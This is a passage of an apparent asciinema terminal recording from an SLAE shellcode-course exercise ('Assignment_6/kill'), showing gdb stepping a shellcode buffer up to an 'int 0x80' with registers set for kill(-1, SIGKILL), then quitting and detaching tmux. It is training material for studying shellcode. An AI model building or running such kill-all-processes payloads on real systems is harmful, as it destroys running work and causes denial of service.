gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:41 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[25;11H\u001b[?12l\u001b[?25h"]
[110.872975, "o", "\u001b[1;25r\u001b[5S\u001b[21;1HA debugging session is active.\u001b[23;9HInferior 1 [process 18663] will be killed.\u001b[25;1HQuit anyway? (y or n) \u001b[1;26r\u001b[25;23H"]
[112.160948, "o", "y"]
[112.409758, "o", "\u001b[1;25r\u001b[25;94H\n\u001b[1;26r\u001b[25;1H"]
[112.416898, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                             \u001b[25;1H \r"]
[112.419729, "o", "\u001b[1;25r\u001b[25;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b[1;26r\u001b[25;60H\u001b(B\u001b[m"]
[112.420178, "o", "\u001b[1;25r\u001b[25;94H\n\u001b[1;26r\u001b[25;1H"]
[112.4297, "o", "\u001b[37m\u001b[1m % \u001b(B\u001b[m"]
[112.430109, "o", "\u001b[K"]
[112.430558, "o", "\u001b[?2004h"]
[113.667763, "o", "\u001b]0;SLAE ❐ SLAE ● 1 zsh\u0007\u001b[?25l\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 30m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m             ⌨   ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:41 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[25;4H\u001b[?1"]
[113.66826, "o", "2l\u001b[?25h"]
[113.758767, "o", "\u001b[?25l\u001b[HEnd of assembler dump.\u001b[K\r\n0x00402020 in code ()\u001b[K\r\n(gdb) si\u001b[K\r\neax            0x25     37\u001b[K\r\nebx            0xffffffff       -1\u001b[K\r\necx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402021 to 0x40202b:\u001b[K\r\n=> 0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0"]
[113.761402, "o", "x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402021 in code ()\u001b[K\r\n(gdb) exit\u001b[K\r\nUndefined command: \"exit\".  Try \"help\".\u001b[K\r\n(gdb) quit\u001b[K\r\nA debugging session is active.\u001b[K\r\n\u001b[K\r\n        Inferior 1 [process 18663] will be killed.\u001b[K\r\n\u001b[K\r\nQuit anyway? (y or n) y\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 30m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m             ⌨   ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:41 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[25;4H\u001b[?12l\u001b[?25h"]
[113.870104, "o", "\u001b[?25l\u001b[HEnd of assembler dump.\u001b[K\r\n0x00402020 in code ()\u001b[K\r\n(gdb) si\u001b[K\r\neax            0x25     37\u001b[K\r\nebx            0xffffffff       -1\u001b[K\r\necx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402021 to 0x40202b:\u001b[K\r\n=> 0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0"]
[113.870526, "o", "x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402021 in code ()\u001b[K\r\n(gdb) exit\u001b[K\r\nUndefined command: \"exit\".  Try \"help\".\u001b[K\r\n(gdb) quit\u001b[K\r\nA debugging session is active.\u001b[K\r\n\u001b[K\r\n        Inferior 1 [process 18663] will be killed.\u001b[K\r\n\u001b[K\r\nQuit anyway? (y or n) y\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 30m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m             ⌨   ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:41 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[25;4H\u001b[?12l\u001b[?25h"]
[113.988543, "o", "\u001b[?25l\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 30m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:41 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[25;4H\u001b[?12l\u001b[?25h"]
[113.989251, "o", "\u001b[1;26r\u001b(B\u001b[m\u001b[?1l\u001b>\u001b[H\u001b[2J\u001b[?2004l\u001b]112\u0007\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1006l\u001b[?1005l\u001b[?1004l\u001b[?1049l\u001b[23;0;0t[detached (from session SLAE)]\r\n"]
